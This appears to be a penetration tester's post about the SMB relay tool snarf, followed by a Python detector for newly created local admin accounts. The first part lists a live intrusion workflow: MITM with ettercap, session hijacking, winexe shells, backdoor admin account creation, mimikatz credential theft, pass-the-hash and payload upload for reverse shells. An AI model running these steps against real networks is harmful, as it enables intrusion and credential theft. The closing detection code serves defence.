So this has been my workflow for the last two days
(yes, I'm on a live-fire pentest right now for the next 2 days and snarf has gotten me ALL OF THE SHELLS that I have right now):

1) ettercap MITM
2) run snarf
3) randomly try to expire, then nab sessions (copy-pasting hashes out of the UI as I go)
4) winexe -U x%x //127.0.0.1 cmd -> oh look! a shell!
5) hostname, ifconfig - where am I, who did I shell?

method A)
6) net user dirtyhacker dirtyhackerpw /add - net localgroup administrators dirtyhacker /add
7) smbclient -U x%x //127.0.0.1/C$ (sometimes it works, sometimes the session is on a server that won't let me hit C$)

method B)
6) net user add dirtyhacker blah blah blah
7) RDP in using the dirtyhacker creds, run mimikatz, steal passwords, then use metasploit to psexec meterpreter, and proceed from there

8) upload a payload (sometimes powershell, sometimes a custom exe) to lob a shell somewhere
9) continue outside of snarf

So it seems like the fastest way to do it would be to have a powershell or batch file script that you can define as the 'payload', and whenever a session is captured snarf copies and pastes the payload script into the session and attempts to execute it. One can assume the username in the session is the user, and if an LM hash is captured that can be sent in place of the password :D (pass the hash!)

Another consideration is that if a server is shelled (rather than a workstation) it may be prudent to walk through the listed available shares (I've normally used metasploit for this, but I think it can be done with another tool.. nbtstat maybe?). Presuming the user is on Kali Linux, this shouldn't be too hard - and then walk through the available shares and try to connect to one until there is a success.
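From the defender's side, the post-session steps described above (method A and method B both start by creating a local account and then elevating it) leave a cheap-to-detect trace: a Windows Security event 4720 (user account created) followed within minutes by a 4732 (member added to a security-enabled local group) naming the Administrators group on the same host. The following is an added example written for this page, not part of snarf or of the original issue; the event records are constructed samples and the field names (`host`, `subject`, `target`, `member`, `group`) are assumptions about how a log shipper would flatten those events.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Only the handful of fields needed
# for the correlation are modelled; the field names are an assumption.
SAMPLE_EVENTS = [
    # account created and elevated two seconds later: the pattern to flag
    {"time": "2015-03-10T14:02:11", "host": "WS-042", "event_id": 4720,
     "subject": "CORP\\jdoe", "target": "dirtyhacker"},
    {"time": "2015-03-10T14:02:13", "host": "WS-042", "event_id": 4732,
     "subject": "CORP\\jdoe", "group": "Administrators", "member": "dirtyhacker"},
    # benign: helpdesk creates a standard account and never elevates it
    {"time": "2015-03-10T15:30:00", "host": "WS-017", "event_id": 4720,
     "subject": "CORP\\helpdesk", "target": "newhire"},
    # benign: group change, but not an admin group
    {"time": "2015-03-10T16:00:00", "host": "SRV-01", "event_id": 4732,
     "subject": "CORP\\itadmin", "group": "Remote Desktop Users", "member": "contractor"},
    # creation and elevation hours apart: outside the window, not flagged
    {"time": "2015-03-11T09:00:00", "host": "SRV-02", "event_id": 4720,
     "subject": "CORP\\itadmin", "target": "svc_backup"},
    {"time": "2015-03-11T17:00:00", "host": "SRV-02", "event_id": 4732,
     "subject": "CORP\\itadmin", "group": "Administrators", "member": "svc_backup"},
]

# Local and domain groups whose membership confers admin rights.
ADMIN_GROUPS = {"administrators", "domain admins"}


def _ts(value):
    """Parse the ISO-style timestamp used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def find_fresh_local_admins(events, window=timedelta(minutes=10)):
    """Correlate 4720 with a later 4732 into an admin group on the same host.

    Returns a list of (host, account, actor) tuples, one per account that was
    created and elevated within `window`. Account names are compared
    case-insensitively because Windows treats them that way.
    """
    created = {}   # (host, account) -> (creation time, creating subject)
    alerts = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        if ev["event_id"] == 4720:
            key = (ev["host"], ev["target"].lower())
            created[key] = (_ts(ev["time"]), ev["subject"])
        elif ev["event_id"] == 4732 and ev["group"].lower() in ADMIN_GROUPS:
            key = (ev["host"], ev["member"].lower())
            if key in created:
                t_created, actor = created[key]
                if _ts(ev["time"]) - t_created <= window:
                    alerts.append((ev["host"], ev["member"], actor))
    return alerts


if __name__ == "__main__":
    for host, account, actor in find_fresh_local_admins(SAMPLE_EVENTS):
        print(f"ALERT {host}: new account '{account}' made admin by {actor}")
```

The time window is the only tuning knob: legitimate provisioning tends to create an account and grant admin rights in separate change tickets, while a hands-on-keyboard operator does both in the same minute, so a ten-minute window catches the described workflow without paging on every new hire.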